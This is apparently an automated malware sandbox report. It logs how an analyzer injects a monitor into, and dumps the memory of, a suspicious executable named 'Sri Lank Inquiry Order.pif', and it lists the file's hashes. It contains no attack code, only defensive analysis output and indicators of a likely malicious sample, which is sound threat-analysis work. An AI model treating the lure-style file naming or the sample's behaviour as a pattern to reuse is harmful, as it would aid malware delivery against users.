Analysis

Category Package Started Completed Duration Options Log
FILE exe 2020-06-05 14:05:21 2020-06-05 14:12:26 425 seconds Show Options Show Log
route = tor
2020-05-13 09:25:38,805 [root] INFO: Date set to: 20200605T13:45:11, timeout set to: 200
2020-06-05 13:45:11,062 [root] DEBUG: Starting analyzer from: C:\tmp2ssujfce
2020-06-05 13:45:11,062 [root] DEBUG: Storing results at: C:\ByVGSHdD
2020-06-05 13:45:11,062 [root] DEBUG: Pipe server name: \\.\PIPE\gSsewmPuyG
2020-06-05 13:45:11,062 [root] DEBUG: Python path: C:\Users\Louise\AppData\Local\Programs\Python\Python38-32
2020-06-05 13:45:11,062 [root] DEBUG: No analysis package specified, trying to detect it automagically.
2020-06-05 13:45:11,062 [root] INFO: Automatically selected analysis package "exe"
2020-06-05 13:45:11,062 [root] DEBUG: Trying to import analysis package "exe"...
2020-06-05 13:45:11,109 [root] DEBUG: Imported analysis package "exe".
2020-06-05 13:45:11,109 [root] DEBUG: Trying to initialize analysis package "exe"...
2020-06-05 13:45:11,109 [root] DEBUG: Initialized analysis package "exe".
2020-06-05 13:45:11,156 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.browser"...
2020-06-05 13:45:11,171 [root] DEBUG: Imported auxiliary module "modules.auxiliary.browser".
2020-06-05 13:45:11,187 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.curtain"...
2020-06-05 13:45:11,218 [root] DEBUG: Imported auxiliary module "modules.auxiliary.curtain".
2020-06-05 13:45:11,218 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.digisig"...
2020-06-05 13:45:11,281 [root] DEBUG: Imported auxiliary module "modules.auxiliary.digisig".
2020-06-05 13:45:11,281 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.disguise"...
2020-06-05 13:45:11,296 [root] DEBUG: Imported auxiliary module "modules.auxiliary.disguise".
2020-06-05 13:45:11,296 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.human"...
2020-06-05 13:45:11,312 [root] DEBUG: Imported auxiliary module "modules.auxiliary.human".
2020-06-05 13:45:11,312 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.procmon"...
2020-06-05 13:45:11,312 [root] DEBUG: Imported auxiliary module "modules.auxiliary.procmon".
2020-06-05 13:45:11,312 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.screenshots"...
2020-06-05 13:45:11,328 [modules.auxiliary.screenshots] DEBUG: Importing 'time'
2020-06-05 13:45:11,328 [modules.auxiliary.screenshots] DEBUG: Importing 'StringIO'
2020-06-05 13:45:11,328 [modules.auxiliary.screenshots] DEBUG: Importing 'Thread'
2020-06-05 13:45:11,328 [modules.auxiliary.screenshots] DEBUG: Importing 'Auxiliary'
2020-06-05 13:45:11,328 [modules.auxiliary.screenshots] DEBUG: Importing 'NetlogFile'
2020-06-05 13:45:11,328 [modules.auxiliary.screenshots] DEBUG: Importing 'Screenshot'
2020-06-05 13:45:11,328 [lib.api.screenshot] DEBUG: Importing 'math'
2020-06-05 13:45:11,328 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageChops'
2020-06-05 13:45:12,421 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageGrab'
2020-06-05 13:45:12,453 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageDraw'
2020-06-05 13:45:12,500 [modules.auxiliary.screenshots] DEBUG: Imports OK
2020-06-05 13:45:12,500 [root] DEBUG: Imported auxiliary module "modules.auxiliary.screenshots".
2020-06-05 13:45:12,500 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.sysmon"...
2020-06-05 13:45:12,500 [root] DEBUG: Imported auxiliary module "modules.auxiliary.sysmon".
2020-06-05 13:45:12,500 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.usage"...
2020-06-05 13:45:12,546 [root] DEBUG: Imported auxiliary module "modules.auxiliary.usage".
2020-06-05 13:45:12,546 [root] DEBUG: Trying to initialize auxiliary module "Browser"...
2020-06-05 13:45:12,546 [root] DEBUG: Initialized auxiliary module "Browser".
2020-06-05 13:45:12,546 [root] DEBUG: Trying to start auxiliary module "Browser"...
2020-06-05 13:45:12,546 [root] DEBUG: Started auxiliary module Browser
2020-06-05 13:45:12,546 [root] DEBUG: Trying to initialize auxiliary module "Curtain"...
2020-06-05 13:45:12,593 [root] DEBUG: Initialized auxiliary module "Curtain".
2020-06-05 13:45:12,593 [root] DEBUG: Trying to start auxiliary module "Curtain"...
2020-06-05 13:45:12,593 [root] DEBUG: Started auxiliary module Curtain
2020-06-05 13:45:12,593 [root] DEBUG: Trying to initialize auxiliary module "DigiSig"...
2020-06-05 13:45:12,593 [root] DEBUG: Initialized auxiliary module "DigiSig".
2020-06-05 13:45:12,593 [root] DEBUG: Trying to start auxiliary module "DigiSig"...
2020-06-05 13:45:12,609 [modules.auxiliary.digisig] DEBUG: Checking for a digital signature.
2020-06-05 13:45:13,390 [modules.auxiliary.digisig] DEBUG: File is not signed.
2020-06-05 13:45:13,390 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json
2020-06-05 13:45:13,390 [root] DEBUG: Started auxiliary module DigiSig
2020-06-05 13:45:13,406 [root] DEBUG: Trying to initialize auxiliary module "Disguise"...
2020-06-05 13:45:13,406 [root] DEBUG: Initialized auxiliary module "Disguise".
2020-06-05 13:45:13,406 [root] DEBUG: Trying to start auxiliary module "Disguise"...
2020-06-05 13:45:13,437 [root] DEBUG: Started auxiliary module Disguise
2020-06-05 13:45:13,437 [root] DEBUG: Trying to initialize auxiliary module "Human"...
2020-06-05 13:45:13,437 [root] DEBUG: Initialized auxiliary module "Human".
2020-06-05 13:45:13,437 [root] DEBUG: Trying to start auxiliary module "Human"...
2020-06-05 13:45:13,437 [root] DEBUG: Started auxiliary module Human
2020-06-05 13:45:13,437 [root] DEBUG: Trying to initialize auxiliary module "Procmon"...
2020-06-05 13:45:13,437 [root] DEBUG: Initialized auxiliary module "Procmon".
2020-06-05 13:45:13,437 [root] DEBUG: Trying to start auxiliary module "Procmon"...
2020-06-05 13:45:13,437 [root] DEBUG: Started auxiliary module Procmon
2020-06-05 13:45:13,437 [root] DEBUG: Trying to initialize auxiliary module "Screenshots"...
2020-06-05 13:45:13,437 [root] DEBUG: Initialized auxiliary module "Screenshots".
2020-06-05 13:45:13,437 [root] DEBUG: Trying to start auxiliary module "Screenshots"...
2020-06-05 13:45:13,453 [root] DEBUG: Started auxiliary module Screenshots
2020-06-05 13:45:13,453 [root] DEBUG: Trying to initialize auxiliary module "Sysmon"...
2020-06-05 13:45:13,484 [root] DEBUG: Initialized auxiliary module "Sysmon".
2020-06-05 13:45:13,484 [root] DEBUG: Trying to start auxiliary module "Sysmon"...
2020-06-05 13:45:13,484 [root] DEBUG: Started auxiliary module Sysmon
2020-06-05 13:45:13,484 [root] DEBUG: Trying to initialize auxiliary module "Usage"...
2020-06-05 13:45:13,484 [root] DEBUG: Initialized auxiliary module "Usage".
2020-06-05 13:45:13,484 [root] DEBUG: Trying to start auxiliary module "Usage"...
2020-06-05 13:45:13,484 [root] DEBUG: Started auxiliary module Usage
2020-06-05 13:45:13,484 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL option
2020-06-05 13:45:13,484 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL_64 option
2020-06-05 13:45:13,484 [root] INFO: Analyzer: Package modules.packages.exe does not specify a loader option
2020-06-05 13:45:13,484 [root] INFO: Analyzer: Package modules.packages.exe does not specify a loader_64 option
2020-06-05 13:45:13,625 [lib.api.process] INFO: Successfully executed process from path "C:\Users\Louise\AppData\Local\Temp\Sri Lank Inquiry Order.pif" with arguments "" with pid 4740
2020-06-05 13:45:13,625 [lib.api.process] INFO: Monitor config for process 4740: C:\tmp2ssujfce\dll\4740.ini
2020-06-05 13:45:13,640 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2ssujfce\dll\onPbkgRA.dll, loader C:\tmp2ssujfce\bin\VTJYuNj.exe
2020-06-05 13:45:13,734 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\gSsewmPuyG.
2020-06-05 13:45:13,750 [root] DEBUG: Loader: Injecting process 4740 (thread 2136) with C:\tmp2ssujfce\dll\onPbkgRA.dll.
2020-06-05 13:45:13,750 [root] DEBUG: Process image base: 0x00400000
2020-06-05 13:45:13,750 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmp2ssujfce\dll\onPbkgRA.dll.
2020-06-05 13:45:13,750 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-06-05 13:45:13,750 [root] DEBUG: Successfully injected DLL C:\tmp2ssujfce\dll\onPbkgRA.dll.
2020-06-05 13:45:13,765 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 4740
2020-06-05 13:45:15,765 [lib.api.process] INFO: Successfully resumed process with pid 4740
2020-06-05 13:45:16,265 [root] DEBUG: Python path set to 'C:\Users\Louise\AppData\Local\Programs\Python\Python38-32'.
2020-06-05 13:45:16,281 [root] DEBUG: Dropped file limit defaulting to 100.
2020-06-05 13:45:16,281 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-06-05 13:45:16,281 [root] DEBUG: CAPE initialised: 32-bit monitor loaded in process 4740 at 0x70390000, image base 0x400000, stack from 0x186000-0x190000
2020-06-05 13:45:16,296 [root] DEBUG: Commandline: C:\Users\Louise\AppData\Local\Temp\"C:\Users\Louise\AppData\Local\Temp\Sri Lank Inquiry Order.pif".
2020-06-05 13:45:16,343 [root] INFO: loaded: b'4740'
2020-06-05 13:45:16,343 [root] INFO: Loaded monitor into process with pid 4740
2020-06-05 13:45:16,359 [root] INFO: Disabling sleep skipping.
2020-06-05 13:45:16,359 [root] INFO: Disabling sleep skipping.
2020-06-05 13:45:16,359 [root] INFO: Disabling sleep skipping.
2020-06-05 13:45:16,359 [root] INFO: Disabling sleep skipping.
2020-06-05 13:45:16,375 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0xc8 amd local view 0x03AC0000 to global list.
2020-06-05 13:45:16,390 [root] DEBUG: DLL loaded at 0x735B0000: C:\Windows\system32\SXS (0x5f000 bytes).
2020-06-05 13:45:16,453 [root] DEBUG: DLL loaded at 0x70370000: C:\Windows\system32\asycfilt (0x14000 bytes).
2020-06-05 13:45:16,500 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x104 amd local view 0x03FA0000 to global list.
2020-06-05 13:45:16,515 [root] DEBUG: DLL loaded at 0x744D0000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2020-06-05 13:45:16,531 [root] DEBUG: DLL loaded at 0x74400000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2020-06-05 13:45:16,546 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x110 amd local view 0x01CF0000 to global list.
2020-06-05 13:45:16,578 [root] DEBUG: DLL loaded at 0x73590000: C:\Windows\system32\VERSION (0x9000 bytes).
2020-06-05 13:45:16,578 [root] DEBUG: DLL unloaded from 0x00400000.
2020-06-05 13:45:33,203 [root] DEBUG: set_caller_info: Adding region at 0x004C0000 to caller regions list (ntdll::LdrLoadDll).
2020-06-05 13:45:33,218 [root] DEBUG: set_caller_info: Adding region at 0x01D80000 to caller regions list (kernel32::GetSystemTime).
2020-06-05 13:45:33,234 [root] DEBUG: DumpMemory: Exception occured reading memory address 0x1d80000
2020-06-05 13:45:33,234 [root] DEBUG: DumpRegion: Failed to dump entire allocation from 0x01D80000 size 0x400000.
2020-06-05 13:45:33,234 [root] INFO: ('dump_file', 'C:\\ByVGSHdD\\CAPE\\4740_254855266332506662020', b'9;?C:\\Users\\Louise\\AppData\\Local\\Temp\\Sri Lank Inquiry Order.pif;?C:\\Users\\Louise\\AppData\\Local\\Temp\\Sri Lank Inquiry Order.pif;?0x01D80000;?', ['4740'], 'CAPE')
2020-06-05 13:45:33,281 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\ByVGSHdD\CAPE\4740_254855266332506662020 (size 0x50638)
2020-06-05 13:45:33,281 [root] DEBUG: DumpRegion: Dumped stack region from 0x01D80000, size 0x7f000.
2020-06-05 13:45:33,312 [root] INFO: ('dump_file', 'C:\\ByVGSHdD\\CAPE\\4740_1606944802332506662020', b'9;?C:\\Users\\Louise\\AppData\\Local\\Temp\\Sri Lank Inquiry Order.pif;?C:\\Users\\Louise\\AppData\\Local\\Temp\\Sri Lank Inquiry Order.pif;?0x004C0000;?', ['4740'], 'CAPE')
2020-06-05 13:45:33,312 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\ByVGSHdD\CAPE\4740_1606944802332506662020 (size 0x332f)
2020-06-05 13:45:33,328 [root] DEBUG: DumpRegion: Dumped stack region from 0x004C0000, size 0x8000.
2020-06-05 13:45:36,312 [root] INFO: Announced 32-bit process name: Sri Lank Inquiry Order.pif pid: 4088
2020-06-05 13:45:36,312 [lib.api.process] INFO: Monitor config for process 4088: C:\tmp2ssujfce\dll\4088.ini
2020-06-05 13:45:36,312 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2ssujfce\dll\onPbkgRA.dll, loader C:\tmp2ssujfce\bin\VTJYuNj.exe
2020-06-05 13:45:36,359 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\gSsewmPuyG.
2020-06-05 13:45:36,359 [root] DEBUG: Loader: Injecting process 4088 (thread 4936) with C:\tmp2ssujfce\dll\onPbkgRA.dll.
2020-06-05 13:45:36,359 [root] DEBUG: Process image base: 0x00400000
2020-06-05 13:45:36,359 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmp2ssujfce\dll\onPbkgRA.dll.
2020-06-05 13:45:36,359 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-06-05 13:45:36,359 [root] DEBUG: Successfully injected DLL C:\tmp2ssujfce\dll\onPbkgRA.dll.
2020-06-05 13:45:36,375 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 4088
2020-06-05 13:45:36,406 [root] INFO: Announced 32-bit process name: Sri Lank Inquiry Order.pif pid: 4088
2020-06-05 13:45:36,406 [lib.api.process] INFO: Monitor config for process 4088: C:\tmp2ssujfce\dll\4088.ini
2020-06-05 13:45:36,406 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2ssujfce\dll\onPbkgRA.dll, loader C:\tmp2ssujfce\bin\VTJYuNj.exe
2020-06-05 13:45:36,437 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\gSsewmPuyG.
2020-06-05 13:45:36,437 [root] DEBUG: Loader: Injecting process 4088 (thread 4936) with C:\tmp2ssujfce\dll\onPbkgRA.dll.
2020-06-05 13:45:36,437 [root] DEBUG: Process image base: 0x00400000
2020-06-05 13:45:36,453 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmp2ssujfce\dll\onPbkgRA.dll.
2020-06-05 13:45:36,453 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-06-05 13:45:36,453 [root] DEBUG: Successfully injected DLL C:\tmp2ssujfce\dll\onPbkgRA.dll.
2020-06-05 13:45:36,468 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 4088
2020-06-05 13:45:36,484 [root] INFO: Announced 32-bit process name: Sri Lank Inquiry Order.pif pid: 4088
2020-06-05 13:45:36,484 [lib.api.process] INFO: Monitor config for process 4088: C:\tmp2ssujfce\dll\4088.ini
2020-06-05 13:45:36,484 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2ssujfce\dll\onPbkgRA.dll, loader C:\tmp2ssujfce\bin\VTJYuNj.exe
2020-06-05 13:45:36,515 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\gSsewmPuyG.
2020-06-05 13:45:36,515 [root] DEBUG: Loader: Injecting process 4088 (thread 0) with C:\tmp2ssujfce\dll\onPbkgRA.dll.
2020-06-05 13:45:36,531 [root] DEBUG: Error 0 (0x0) - GetProcessInitialThreadId: Remote PEB 0x7EFDE000 Local PEB 0x7EFDD000 Local TEB 0x7EFDE000: The operation completed successfully.
2020-06-05 13:45:36,531 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 4936, handle 0xc4
2020-06-05 13:45:36,531 [root] DEBUG: Process image base: 0x00400000
2020-06-05 13:45:36,531 [root] DEBUG: InjectDllViaIAT: Modified EP detected, rebasing IAT patch to new image base 0x00400000 (context EP 0x004014C0)
2020-06-05 13:45:36,531 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmp2ssujfce\dll\onPbkgRA.dll.
2020-06-05 13:45:36,546 [root] DEBUG: InjectDllViaIAT: Memory region at 0x07000000 not empty.
2020-06-05 13:45:36,546 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-06-05 13:45:36,546 [root] DEBUG: Successfully injected DLL C:\tmp2ssujfce\dll\onPbkgRA.dll.
2020-06-05 13:45:36,546 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 4088
2020-06-05 13:45:36,546 [root] INFO: ('dump_file', 'C:\\ByVGSHdD\\CAPE\\4740_396896202262606662020', b'4;?C:\\Users\\Louise\\AppData\\Local\\Temp\\Sri Lank Inquiry Order.pif;?C:\\Users\\Louise\\AppData\\Local\\Temp\\Sri Lank Inquiry Order.pif;?C:\\Users\\Louise\\AppData\\Local\\Temp\\Sri Lank Inquiry Order.pif;?4088;?', ['4740'], 'CAPE')
2020-06-05 13:45:36,578 [root] INFO: Announced 32-bit process name: Sri Lank Inquiry Order.pif pid: 4088
2020-06-05 13:45:36,578 [lib.api.process] INFO: Monitor config for process 4088: C:\tmp2ssujfce\dll\4088.ini
2020-06-05 13:45:36,578 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2ssujfce\dll\onPbkgRA.dll, loader C:\tmp2ssujfce\bin\VTJYuNj.exe
2020-06-05 13:45:36,609 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\gSsewmPuyG.
2020-06-05 13:45:36,609 [root] DEBUG: Loader: Injecting process 4088 (thread 0) with C:\tmp2ssujfce\dll\onPbkgRA.dll.
2020-06-05 13:45:36,609 [root] DEBUG: Error 0 (0x0) - GetProcessInitialThreadId: Remote PEB 0x7EFDE000 Local PEB 0x7EFDD000 Local TEB 0x7EFDE000: The operation completed successfully.
2020-06-05 13:45:36,609 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 4936, handle 0xc4
2020-06-05 13:45:36,609 [root] DEBUG: Process image base: 0x00400000
2020-06-05 13:45:36,609 [root] DEBUG: InjectDllViaIAT: Modified EP detected, rebasing IAT patch to new image base 0x00400000 (context EP 0x004014C0)
2020-06-05 13:45:36,609 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmp2ssujfce\dll\onPbkgRA.dll.
2020-06-05 13:45:36,625 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-06-05 13:45:36,625 [root] DEBUG: Successfully injected DLL C:\tmp2ssujfce\dll\onPbkgRA.dll.
2020-06-05 13:45:36,625 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 4088
2020-06-05 13:45:36,625 [root] INFO: Announced 32-bit process name: Sri Lank Inquiry Order.pif pid: 4088
2020-06-05 13:45:36,640 [lib.api.process] INFO: Monitor config for process 4088: C:\tmp2ssujfce\dll\4088.ini
2020-06-05 13:45:36,640 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2ssujfce\dll\onPbkgRA.dll, loader C:\tmp2ssujfce\bin\VTJYuNj.exe
2020-06-05 13:45:36,671 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\gSsewmPuyG.
2020-06-05 13:45:36,671 [root] DEBUG: Loader: Injecting process 4088 (thread 4936) with C:\tmp2ssujfce\dll\onPbkgRA.dll.
2020-06-05 13:45:36,671 [root] DEBUG: Process image base: 0x00400000
2020-06-05 13:45:36,671 [root] DEBUG: InjectDllViaIAT: Modified EP detected, rebasing IAT patch to new image base 0x00400000 (context EP 0x004014C0)
2020-06-05 13:45:36,671 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmp2ssujfce\dll\onPbkgRA.dll.
2020-06-05 13:45:36,671 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-06-05 13:45:36,671 [root] DEBUG: Successfully injected DLL C:\tmp2ssujfce\dll\onPbkgRA.dll.
2020-06-05 13:45:36,687 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 4088
2020-06-05 13:45:36,703 [root] INFO: ('dump_file', 'C:\\ByVGSHdD\\CAPE\\4740_1821066611262606662020', b'3;?C:\\Users\\Louise\\AppData\\Local\\Temp\\Sri Lank Inquiry Order.pif;?C:\\Users\\Louise\\AppData\\Local\\Temp\\Sri Lank Inquiry Order.pif;?C:\\Users\\Louise\\AppData\\Local\\Temp\\Sri Lank Inquiry Order.pif;?4088;?', ['4740'], 'CAPE')
2020-06-05 13:45:36,781 [root] INFO: ('dump_file', 'C:\\ByVGSHdD\\CAPE\\4740_942954961262606662020', b'3;?C:\\Users\\Louise\\AppData\\Local\\Temp\\Sri Lank Inquiry Order.pif;?C:\\Users\\Louise\\AppData\\Local\\Temp\\Sri Lank Inquiry Order.pif;?C:\\Users\\Louise\\AppData\\Local\\Temp\\Sri Lank Inquiry Order.pif;?4088;?', ['4740'], 'CAPE')
2020-06-05 13:45:36,796 [root] WARNING: Unable to open termination event for pid 4740.
2020-06-05 13:45:36,828 [root] INFO: ('dump_file', 'C:\\Users\\Louise\\AppData\\Local\\Temp\\~DFB1B9194643FC134C.TMP', '', False, 'files')
2020-06-05 13:45:36,828 [root] DEBUG: Python path set to 'C:\Users\Louise\AppData\Local\Programs\Python\Python38-32'.
2020-06-05 13:45:36,843 [root] DEBUG: Dropped file limit defaulting to 100.
2020-06-05 13:45:36,875 [root] INFO: Disabling sleep skipping.
2020-06-05 13:45:36,875 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-06-05 13:45:36,875 [root] DEBUG: CAPE initialised: 32-bit monitor loaded in process 4088 at 0x70390000, image base 0x400000, stack from 0x186000-0x190000
2020-06-05 13:45:39,156 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0xc4 amd local view 0x74F40000 to global list.
2020-06-05 13:45:39,171 [root] DEBUG: DLL loaded at 0x74F40000: C:\Windows\syswow64\shell32 (0xc4c000 bytes).
2020-06-05 13:45:39,203 [root] DEBUG: DLL loaded at 0x75CC0000: C:\Windows\syswow64\wininet (0x1c4000 bytes).
2020-06-05 13:45:39,203 [root] DEBUG: DLL loaded at 0x76E40000: C:\Windows\syswow64\api-ms-win-downlevel-user32-l1-1-0 (0x4000 bytes).
2020-06-05 13:45:39,218 [root] DEBUG: DLL loaded at 0x74E90000: C:\Windows\syswow64\api-ms-win-downlevel-shlwapi-l1-1-0 (0x4000 bytes).
2020-06-05 13:45:39,218 [root] DEBUG: DLL loaded at 0x76EE0000: C:\Windows\syswow64\api-ms-win-downlevel-version-l1-1-0 (0x4000 bytes).
2020-06-05 13:45:39,234 [root] DEBUG: DLL loaded at 0x73590000: C:\Windows\system32\version (0x9000 bytes).
2020-06-05 13:45:39,234 [root] DEBUG: DLL loaded at 0x767F0000: C:\Windows\syswow64\api-ms-win-downlevel-normaliz-l1-1-0 (0x3000 bytes).
2020-06-05 13:45:39,249 [root] DEBUG: DLL loaded at 0x766F0000: C:\Windows\syswow64\normaliz (0x3000 bytes).
2020-06-05 13:45:39,249 [root] DEBUG: DLL loaded at 0x76BA0000: C:\Windows\syswow64\iertutil (0x215000 bytes).
2020-06-05 13:45:39,249 [root] DEBUG: DLL loaded at 0x76EF0000: C:\Windows\syswow64\api-ms-win-downlevel-advapi32-l1-1-0 (0x5000 bytes).
2020-06-05 13:45:39,296 [root] DEBUG: DLL loaded at 0x73230000: C:\Windows\system32\Secur32 (0x8000 bytes).
2020-06-05 13:45:39,296 [root] DEBUG: DLL loaded at 0x74440000: C:\Windows\system32\profapi (0xb000 bytes).
2020-06-05 13:45:39,296 [root] DEBUG: DLL loaded at 0x72DF0000: C:\Windows\system32\api-ms-win-downlevel-advapi32-l2-1-0 (0x4000 bytes).
2020-06-05 13:45:39,343 [root] DEBUG: DLL loaded at 0x76EB0000: C:\Windows\syswow64\api-ms-win-downlevel-ole32-l1-1-0 (0x4000 bytes).
2020-06-05 13:45:39,375 [root] DEBUG: DLL loaded at 0x763F0000: C:\Windows\syswow64\WS2_32 (0x35000 bytes).
2020-06-05 13:45:39,390 [root] DEBUG: DLL loaded at 0x760B0000: C:\Windows\syswow64\NSI (0x6000 bytes).
2020-06-05 13:45:39,406 [root] DEBUG: DLL loaded at 0x6EA70000: C:\Windows\system32\winhttp (0x58000 bytes).
2020-06-05 13:45:39,421 [root] DEBUG: DLL loaded at 0x6EA20000: C:\Windows\system32\webio (0x50000 bytes).
2020-06-05 13:45:39,421 [root] DEBUG: DLL unloaded from 0x6EA70000.
2020-06-05 13:45:39,437 [root] DEBUG: DLL loaded at 0x74880000: C:\Windows\system32\IPHLPAPI (0x1c000 bytes).
2020-06-05 13:45:39,468 [root] DEBUG: DLL loaded at 0x74870000: C:\Windows\system32\WINNSI (0x7000 bytes).
2020-06-05 13:45:39,468 [root] DEBUG: DLL loaded at 0x74490000: C:\Windows\system32\mswsock (0x3c000 bytes).
2020-06-05 13:45:39,484 [root] DEBUG: DLL loaded at 0x72DE0000: C:\Windows\System32\wship6 (0x6000 bytes).
2020-06-05 13:45:39,500 [root] DEBUG: DLL loaded at 0x702A0000: C:\Windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0 (0x4000 bytes).
2020-06-05 13:45:39,515 [root] DEBUG: DLL loaded at 0x70250000: C:\Windows\system32\DNSAPI (0x44000 bytes).
2020-06-05 13:45:39,531 [root] DEBUG: DLL loaded at 0x76170000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2020-06-05 13:45:39,531 [root] DEBUG: DLL loaded at 0x70310000: C:\Windows\System32\netprofm (0x5a000 bytes).
2020-06-05 13:45:39,531 [root] DEBUG: DLL loaded at 0x72E10000: C:\Windows\System32\nlaapi (0x10000 bytes).
2020-06-05 13:45:39,546 [root] DEBUG: DLL loaded at 0x702D0000: C:\Windows\system32\dhcpcsvc6 (0xd000 bytes).
2020-06-05 13:45:39,562 [root] DEBUG: DLL loaded at 0x746C0000: C:\Windows\System32\wshtcpip (0x5000 bytes).
2020-06-05 13:45:39,562 [root] DEBUG: DLL loaded at 0x70230000: C:\Windows\system32\rasadhlp (0x6000 bytes).
2020-06-05 13:45:39,562 [root] DEBUG: DLL loaded at 0x744D0000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2020-06-05 13:45:39,593 [root] DEBUG: DLL loaded at 0x74400000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2020-06-05 13:45:39,593 [root] DEBUG: DLL loaded at 0x74340000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2020-06-05 13:45:39,593 [root] DEBUG: DLL loaded at 0x702B0000: C:\Windows\system32\dhcpcsvc (0x12000 bytes).
2020-06-05 13:45:39,609 [root] DEBUG: DLL loaded at 0x75B90000: C:\Windows\syswow64\urlmon (0x124000 bytes).
2020-06-05 13:45:39,625 [root] DEBUG: DLL loaded at 0x72E00000: C:\Windows\System32\npmproxy (0x8000 bytes).
2020-06-05 13:45:40,328 [root] DEBUG: DLL loaded at 0x6FAE0000: C:\Windows\System32\fwpuclnt (0x38000 bytes).
2020-06-05 13:45:40,375 [root] DEBUG: DLL loaded at 0x73A10000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\Comctl32 (0x19e000 bytes).
2020-06-05 13:45:40,375 [root] DEBUG: DLL unloaded from 0x746C0000.
2020-06-05 13:45:40,406 [root] DEBUG: DLL unloaded from 0x72DE0000.
2020-06-05 13:45:41,187 [root] DEBUG: CreateThread: Initialising breakpoints for thread 3988.
2020-06-05 13:45:41,187 [root] DEBUG: DLL unloaded from 0x77340000.
2020-06-05 13:45:45,203 [root] DEBUG: NtTerminateProcess hook: Processing tracked regions before shutdown (process 4088).
2020-06-05 13:45:45,265 [root] DEBUG: ClearAllBreakpoints: Error: no thread id for thread breakpoints 0x220ec28.
2020-06-05 13:48:36,390 [root] INFO: Analysis timeout hit, terminating analysis.
2020-06-05 13:48:36,390 [lib.api.process] ERROR: Failed to open terminate event for pid 4740
2020-06-05 13:48:36,390 [root] INFO: Terminate event set for process 4740.
2020-06-05 13:48:36,390 [root] INFO: Created shutdown mutex.
2020-06-05 13:48:37,406 [root] INFO: Shutting down package.
2020-06-05 13:48:37,406 [root] INFO: Stopping auxiliary modules.
2020-06-05 13:48:38,218 [lib.common.results] WARNING: File C:\ByVGSHdD\bin\procmon.xml doesn't exist anymore
2020-06-05 13:48:38,218 [root] INFO: Finishing auxiliary modules.
2020-06-05 13:48:38,218 [root] INFO: Shutting down pipe server and dumping dropped files.
2020-06-05 13:48:38,249 [root] INFO: Uploading files at path "C:\ByVGSHdD\debugger" 
2020-06-05 13:48:38,296 [root] WARNING: Monitor injection attempted but failed for process 4088.
2020-06-05 13:48:38,296 [root] INFO: Analysis completed.

Machine

Name Label Manager Started On Shutdown On
win7x64_1 win7x64_5 KVM 2020-06-05 14:05:21 2020-06-05 14:12:26

File Details

File Name Sri Lank Inquiry Order.pif
File Size 81920 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
PE timestamp 2011-12-12 20:46:08
MD5 3f2fd6c7f2735d8ebba0984ef18f67b0
SHA1 f79d62727a698d8360da2fd4f872f82fe451f419
SHA256 3ccf8c8e41e08d5a8152659ca2cd6348a15c126ca4571129d4a118de63d45f80
